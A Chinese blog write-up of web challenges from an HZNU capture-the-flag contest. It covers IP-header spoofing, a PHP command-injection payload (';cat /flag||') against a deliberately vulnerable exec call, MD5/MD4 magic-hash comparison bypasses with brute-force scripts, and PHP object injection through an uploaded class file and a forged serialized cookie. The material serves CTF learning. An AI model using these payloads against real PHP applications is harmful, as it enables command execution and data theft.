HZNU-web

最新推荐文章于 2024-04-24 20:22:36 发布
最新推荐文章于 2024-04-24 20:22:36 发布
阅读量395 收藏
点赞数
分类专栏: 比赛
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/yuermon/article/details/116089312
版权

Signin

在这里插入图片描述
打开场景,说是没有定义的ip,也就是要修改ip地址,直接抓包
在这里插入图片描述
一开始尝试XFF但是没成功,用Client成功了
payload1:
Client-Ip: 127.0.0.1
又说必须要是handsome guys,因此就修改User-Agent,得到flag
在这里插入图片描述
后记:
不知道是操作原因还是环境原因,差点拿一血了来着,唉

Command shell

打开页面就是源码,一步一步来吧

<?php
    error_reporting(0);
    highlight_file(__FILE__);
    if(isset($_GET['file'])){
        $p=$_GET['file'];
        $a = $_GET['a'];
        if(!(is_file($p)===false)){
            if(is_numeric($a) && strlen($a)<8 && ($a**2)==0 &&$a!=0){
                if(substr(md5($_GET['b']),0,6)==='2b3599'){
                $count = $_GET['count'];
                echo "The count is ".exec('printf \'' . $count . '\' | wc -c');
                }else{
                    echo '很近了';
                }
            }else{
                echo "还是太年轻了...";
            }
        }else{
            echo '第一关都过不了?';
        }
    }
?>

0x01:

 $p=$_GET['file'];
 if(!(is_file($p)===false))

要求$p是当前存在的文件的名字,一般都会有index.php,那就直接用吧
payload1:
file=index.php

0x02:

$a = $_GET['a'];
if(is_numeric($a) && strlen($a)<8 && ($a**2)==0 &&$a!=0)

有四个条件,要是数字并且长度小于8,二次幂的值为0,但是又不能为0
直接写出来吧
payload2:
a=1e-199

0x03:

if(substr(md5($_GET['b']),0,6)==='2b3599')

用之前找到的大佬的脚本跑就行了

import hashlib
def main(x):
    for i in range(1,100000000):
        MD5 = hashlib.md5(str(i).encode('utf-8')).hexdigest()
        if MD5[0:6] == str(x):
            print(i)
if __name__ == '__main__':
    main('2b3599')

0x04:

echo "The count is ".exec('printf \'' . $count . '\' | wc -c');

这里才是这道题的重点了
利用exec函数进行命令执行
一开始里面有\'以至于有两个单引号需要自己闭合,并且printf和后面的| wc -c都不用执行,所以可以用管道符截掉
payload3:
count=';cat /flag||'

总的payload:

?file=index.php&a=1e-199&b=17808027&count=%27;cat%20/flag||%27

后记:
其实之前做到过类似(都可以说一模一样了)的题目

Funmd5

打开场景,开始代码审计

<?php
error_reporting(0);
highlight_file(__FILE__);
$flag = file_get_contents('/flag');
$str1 = $_GET['str1'];
$str2 = $_GET['str2'];
if($_GET['num']!==123456 && preg_match('/^123456/',$_GET['num'])){
    echo '1st ok'."<br>";
    
}else{
    die('toooo young');
}

if(is_numeric($str1)){
    $md5_1 = md5($str1);
    $md5_2 = md5($str2);

    if($md5_1 != $md5_2){
        $a = strtr($md5_1, 'nnnnb', '12345');
        $b = strtr($md5_2, 'nnnnb', '12345');
        if($a == $b){
            echo '2nd ok'."<br>";
        }
        else{
            die("can u give me the right str???");
        }
    } 
    else{
        die("no!!!!!!!!");
    }
}
else{
    die('is str1 numeric??????');
}
if ($_GET["hash1"] == hash("md4", $_GET["hash1"]))
{    
    echo $flag;
    
}else{
    die('bad');
}
?>

0x01:
可以使用%0a来绕过比较和preg_match之间的矛盾,但是不知道是我想错了还是环境问题,这道题直接num=123456就过了

if($_GET['num']!==123456 && preg_match('/^123456/',$_GET['num']))

0x02:
这段怪折磨人的,要实现md5加密之后不相等,但是在字符替换之后又相等了
因为没有强制不能查资料,所以最后找到了可以进行爆破的脚本

if(is_numeric($str1)){
    $md5_1 = md5($str1);
    $md5_2 = md5($str2);

    if($md5_1 != $md5_2){
        $a = strtr($md5_1, 'nnnnb', '12345');
        $b = strtr($md5_2, 'nnnnb', '12345');
        if($a == $b){
            echo '2nd ok'."<br>";
        }
        else{
            die("can u give me the right str???");
        }
    } 
    else{
        die("no!!!!!!!!");
    }
}
else{
    die('is str1 numeric??????');
}

exp:

<?php
$count = 0;
for ($i = 1; $i <= 100000000; $i++) {
    $md5 = strtr(md5($i), 'nnnnb', '12345');
    if (preg_match('/^0e\d+$/', $md5)) {
        echo $i . " " . md5($i) . "<br>";
        $count++;
    }
    if ($count == 2) {
        break;
    }
}

payload2:
str1=11230178&str2=20493141

这里实现了md5值不同但是替换之后又相同是因为,php中以0e开头的数字会被认为是0,而如果md5加密之后以0e开头并且在进行strstr函数的替换之后后面的都是数字,那么得出的结果在php松散比较之下就会实现相等
在这里插入图片描述
0x03:

if ($_GET["hash1"] == hash("md4", $_GET["hash1"]))
{    
    echo $flag;
    
}else{
    die('bad');
}

感觉和上一个类似,如果以0e开头的数据被md4加密之后的值也是以0e开头,这样的话应该就可以绕过了
exp:

for($i=1;$i<=10000000000000;$i++){
	$a = '0e'.$i;
	$hash1 = hash("md4",$a);
	if(preg_match('/^0e\d+$/',$hash1){
		echo $a."\n";
		break;
	}
}

payload3:
hash1=0e251288019

最终payload:
?num=123456&str1=11230178&str2=20493141&hash1=0e251288019

Upload

打开场景发现要文件上传
在这里插入图片描述
一开始以为只是简单的文件上传题目,但是把各个方法试了一下之后都没有成功,所以最后没做出来(主要是一开始以为不能用扫描,就不敢扫,没想到原来可以的
发现有index.php文件信息泄露

<?php
spl_autoload_register();
ini_set('display_errors', false);
error_reporting(0);
echo "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\" /> 
<title>Upload</title>
<form action=\"\" method=\"post\" enctype=\"multipart/form-data\">
上传文件<input type=\"file\" name=\"attach\" />
<input type=\"submit\" name=\"submit\" value=\"上传\" />
</form>";
	if($_FILES["attach"]["error"] == 0) {
    if($_FILES["attach"]['size'] > 0 && $_FILES["attach"]['size'] < 102400) {
        $typeAccepted = ["image/jpeg", "image/gif", "image/png"];
        $blackext = ["php", "php5", "php4", "php3", "phtml", "pht", "jsp", "jspa", "jspx","<",">","jsw", "jsv", "jspf","jtml", "asp", "aspx", "asa", "asax", "ascx", "ashx", "asmx", "cer","swf", "htaccess", "ini"];
        $filearr = pathinfo($_FILES["attach"]["name"]);
        if(!in_array($_FILES["attach"]['type'], $typeAccepted)) {
            exit("type error");
        }
        if(in_array($filearr["extension"], $blackext)) {
            exit("extension error");
        }
        $filename = $_FILES["attach"]["name"];
        if(move_uploaded_file($_FILES["attach"]["tmp_name"], $filename)) {    
            array_push($userinfo, $filename);
            setcookie("userinfo", serialize($userinfo), time() + 60 * 60 * 24 * 30);
            echo htmlspecialchars("upload success, new filename is {$filename} .");
        } else {
            echo "upload error!";
        }
    }
} else {
    echo "no upload file";
}
$userinfo = unserialize($_COOKIE["userinfo"]);
?>

0x01:代码审计+解题
前面一大段代码主要就是对上传到文件进行类型和拓展名的过滤,然后可以发现两行比较特别的代码

setcookie("userinfo", serialize($userinfo), time() + 60 * 60 * 24 * 30);
$userinfo = unserialize($_COOKIE["userinfo"]);

设立了userinfocookie并在最后进行反序列化操作,而抓包之后userinfo这个cookie值是我们控的
但是要上传什么文件就不是很清楚了,最后找了资料发现是php对象注入的题目
小记一次PHP对象注入
在这里插入图片描述
在这里插入图片描述
根据上图可知,我们可以上传一个拓展名为inc的文件,并且定义的类名必须与文件名相同即:
我们上传文件info.inc
则文件里面的内容为:

<?php
class info{
	function __wakeup(){
		phpinfo();
   }
}

##############
<?php
class info{
	function __destruct(){
		phpinfo();
   }
}

之后进行抓包,修改MIME,并在cookie中设置userinfo的值为O:4:"info":0:{},因为wakeup魔术方法会在反序列化之前自动调用,这个时候就自动执行phpinfo();
在这里插入图片描述
之后可以修改魔术方法里面的命令得到flag
在这里插入图片描述

如何绕过校园网认证,不付费就可以使用自己的网络。
qq_41155672的博客
03-14 33万+
绕过校园网认证。
JavaWeb基础
weixin_43261862的博客
02-05 605
JavaWeb 1.基本概念 1.前言 web,网页 静态web html,css 提供给所有人看始终不会改变 动态web 提供给所有人看的数据始终会变化 技术栈:JSP/Servlet,ASP,PHP 动态web资源技术开发技术统称为javaweb 2.web应用程序 应用程序编写完成之后,想给外界访问,需要一个服务器统一管理 3.动态web 2.web服务器 1.JSP/Servlet sun公司主推B/S架构 基于java 可以承载三高问题带来的影响 语法像ASP 2.web服务
php对象注入,小记一次PHP对象注入
weixin_39614146的博客
03-11 165
[PHP] 纯文本查看 复制代码if($_FILES["attach"]["error"] == 0) {if($_FILES["attach"]['size'] > 0 && $_FILES["attach"]['size'] < 102400) {$typeAccepted = ["image/jpeg", "image/gif", "image/png"];$bl...
GlitchBot -HZNU寒假集训
alnxtmp169007749的博客
03-03 177
One of our delivery robots is malfunctioning! The job of the robot is simple; it should follow a list of instructions in order to reach a target destination. The list of instructions is originall...
php 对象注入,小记一次PHP对象注入
weixin_42297390的博客
03-28 217
[PHP] 纯文本查看 复制代码if($_FILES["attach"]["error"] == 0) {if($_FILES["attach"]['size'] > 0 && $_FILES["attach"]['size'] < 102400) {$typeAccepted = ["image/jpeg", "image/gif", "image/png"];$bl...
CTFshow——PHP特性(下)
D.MIND 的博客
02-21 2481
目录:web132——逻辑运算符的优先级web133——curl -Fweb134——php变量覆盖web135—— >xx.txt 写文件web136—— tee命令 web132——逻辑运算符的优先级 打开是一个网站,访问robots.txt 得到指引/admin <?php #error_reporting(0); include("flag.php"); highlight_file(__FILE__); if(isset($_GET['username']) &&
HZNUCTF -- web
pwfortune的博客
04-24 769
(我开始做的时候也是想拼接绕过来着,一直没成功,感觉应该是格式的问题,失败了几次也就直接放弃了,感觉不会这么简单的直接就是引号拼接)是做了一个类似前端的验证啥的,只要出现了 flag 或者 /f* 啥的就会返回那个假的的flag。(尝试ls 只能列出当前目录,列不出根目录,无法cat ,所以尝试 env命令),需要特殊处理 ,[ 就被转换成 _ ,且后面的 点号 . 也可以正常传了。要传参 s_1.1 因为php特性的关系,正常传不了 点号 .但是这道题可以列出来目录,无法读取文件,没有权限,需要提权。
NSSCTF-[HZNUCTF 2023 preliminary]-web
J1ng_Hong的博客
11-13 737
进题发现没有回显,我试着用dirsearch,发现找到的三个网页都是没有回显的。进题看到输入框,并且下面的提示看起来想sql注入,随便输了几次,发现只有数字1、2、3、4有回显,并且输入会逆向。它最后的回显肯定是在class B的__call 魔术方法里,所以我们需要让func和arg成为我们需要的变量。由于序列化中的b代表着Boolean,所以我试着把0改为1。然后我们就看到了回显,但是没找到flag。
HZNUOJ-V3-WebApp:HZNU Online Judge V3 WebApp
03-07
HZNUOJ-V3-WebApp:HZNU在线判题系统V3的Web应用程序】 HZNUOJ(HZNU Online Judge)是一个在线编程练习和评测系统,主要用于教育和竞赛环境,让学生和参赛者可以提交代码并即时获取运行结果和评测报告。其V3版本...
HZNU Online Judge V3 WebApp开发入门指南
- HZNUOJ-V3-WebApp是第三代HZNU Online Judge系统的Web应用版本。Online Judge(OJ)是一种在线编程竞赛平台,允许用户在线提交源代码,并对其进行自动评测,通常用于教学、在线竞赛和个人技能提升。HZNU指的是...
HZNUOJ-V3-WebApp-Preview
03-19
这个项目可能由HZNU(杭州电子科技大学)的学生或教师团队创建,或者与该校有关联。由于没有具体的标签提供更多信息,我们将基于一般的Web应用开发流程和技术栈来探讨可能涉及的知识点。 1. **Web应用框架**:预览...
07计算机网络基础期末试卷七答案.docx
07-10
- 一台主机希望解析域名`qjxy.hznu.edu.cn`,首先查询**地址为202.120.66.68的域名服务器**。 - **知识点**: DNS(Domain Name System)域名系统负责将域名解析为对应的IP地址。查询过程通常遵循从本地DNS服务器到...
第四届“强网杯”全国网络安全挑战赛_部分WP
Lemon's blog
08-25 3295
前言: 全靠大佬带飞,自己菜的一批,还需继续努力!,记录一下
C2000系列DSP芯片串口读写方案与FlashPro2000编程器应用详解
04-27
内容概要:本文详细介绍了基于TMS320F系列芯片的C2000串口读写方案及其编程器——FlashPro2000的功能特点和支持的接口模式。文中不仅涵盖了硬件连接的具体步骤,还提供了代码实例来展示Flash擦除操作,并对比了JTAG和SCI-BOOT两种模式的优缺点。此外,针对不同型号的C2000系列芯片,给出了详细的适配指导以及避免烧录过程中可能出现的问题的方法。 适合人群:从事DSP开发的技术人员,尤其是对TI公司C2000系列芯片有一定了解并希望深入了解其编程和烧录细节的人群。 使用场景及目标:适用于实验室环境下的程序调试阶段,以及生产线上的批量烧录任务。主要目的是帮助开发者选择合适的编程工具和技术手段,提高工作效率,减少因误操作导致设备损坏的风险。 其他说明:文中提供的代码片段和命令行指令可以直接用于实际项目中,同时附带了一些实用技巧,如防止芯片变砖的小贴士和自动化重试脚本,有助于解决常见的烧录难题。
汉字字库存储芯片扩展实验通常是为了学习和理解如何在嵌入式系统或计算机硬件中增加或管理存储资源,特别是针对需要处理中文字符的应用 这类实验对于想要深入了解计算机体系结构、嵌入式开发以及汉字编码的学生和工
04-27
汉字字库存储芯片扩展实验 # 汉字字库存储芯片扩展实验 ## 实验目的 1. 了解汉字字库的存储原理和结构 2. 掌握存储芯片扩展技术 3. 学习如何通过硬件扩展实现大容量汉字字库存储 ## 实验原理 ### 汉字字库存储基础 - 汉字通常采用点阵方式存储(如16×16、224、32×32点阵) - 每个汉字需要占用32字节(16×16)到128字节(32×32)不等的存储空间 - 国标GB2312-80包含6763个汉字,需要较大存储容量 ### 存储芯片扩展方法 1. **位扩展**:增加数据总线宽度 2. **字扩展**:增加存储单元数量 3. **混合扩展**:同时进行位扩展和字扩展 ## 实验设备 - 单片机开发板(如STC89C52) - 存储芯片(如27C256、29C040等) - 逻辑门电路芯片(如74HC138、74HC373等) - 示波器、万用表等测试设备 - 连接线若干 ## 实验步骤 ### 1. 单芯片汉字存储实验 1. 连接27C256 EPROM芯片到单片机系统 2. 将16×16点阵汉字字库写入芯片 3. 编写程序读取并显示汉字 ### 2. 存储芯片字扩展实验 1. 使用地址译码器(如74HC138)扩展多片27C256 2. 将完整GB2312字库分布到各芯片中 3. 编写程序实现跨芯片汉字读取 ### 3. 存储芯片位扩展实验 1. 连接两片27C256实现16位数据总线扩展 2. 优化字库存储结构,提高读取速度 3. 测试并比较扩展前后的性能差异 ## 实验代码示例(单片机部分) ```c #include <reg52.h> #include <intrins.h> // 定义存储芯片控制引脚 sbit CE = P2^7; // 片选 sbit OE = P2^6; // 输出使能 sbit
测控装备干扰源快速侦测系统设计研究.pdf
最新发布
04-27
测控装备干扰源快速侦测系统设计研究.pdf
嵌入式八股文面试题库资料知识宝典-【开发】嵌入式开源项目&库&资料.zip
04-27
嵌入式八股文面试题库资料知识宝典-【开发】嵌入式开源项目&库&资料.zip
嵌入式八股文面试题库资料知识宝典-百度2022年嵌入式面试题.zip
04-27
嵌入式八股文面试题库资料知识宝典-百度2022年嵌入式面试题.zip
少儿编程scratch项目源代码文件案例素材-空间站.zip
04-27
少儿编程scratch项目源代码文件案例素材-空间站.zip
hznu计算机组成原理e
01-08
### 杭州师范大学计算机组成原理课程概述 杭州师范大学的计算机组成原理课程旨在帮助学生深入理解计算机硬件结构及其工作原理。这门课程通常涵盖了计算机系统的各个组成部分,包括但不限于中央处理器(CPU)、存储器、输入/输出设备等基本概念和操作机制[^2]。 #### 主要内容介绍 - **基础知识** - 数制转换与编码方式 - 数据表示形式(定点数、浮点数) - **指令系统架构** - 指令格式解析 - 寻址模式探讨 - **CPU内部结构** - 控制单元的功能描述 - 运算部件的工作流程说明 - **流水线技术** - 流水线的基本概念讲解 - 提高性能的方法讨论 - **存储层次体系** - 缓存(cache)的作用阐述 - 虚拟内存管理策略分析 ```python def fetch_instruction(): """模拟取指过程""" pass def decode_instruction(instruction): """解码指令""" pass def execute_operation(operation_code, operands): """执行运算""" pass fetch_instruction() decode_instruction('ADD R1,R2') execute_operation('+', ['R1', 'R2']) ``` 此部分通过Python伪代码展示了简化版的机器周期——即从取出一条加法指令到完成其指定的操作这一系列动作的过程示例[^4]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值